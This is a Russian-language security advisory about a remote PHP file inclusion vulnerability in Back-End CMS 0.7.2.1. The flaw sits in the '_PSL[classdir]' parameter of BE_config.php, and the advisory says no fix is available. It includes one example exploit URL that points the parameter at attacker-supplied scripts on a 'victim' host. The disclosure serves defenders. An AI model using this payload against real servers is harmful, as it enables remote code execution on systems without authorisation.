PHP-инклюдинг в Back-End CMS

Дата публикации:
31.05.2006
Дата изменения:
17.10.2006
Всего просмотров:
2375
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Back-End CMS 0.x
Уязвимые версии: Back-End CMS 0.7.2.1, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "_PSL[classdir]" в сценарии BE_config.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

http://victim/[Back-End_path]/BE_config.php?_PSL[classdir]=[evil_scripts]

URL производителя: back-end.org

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Back-End CMS - Remote File Include Vulnerabilities

или введите имя

CAPTCHA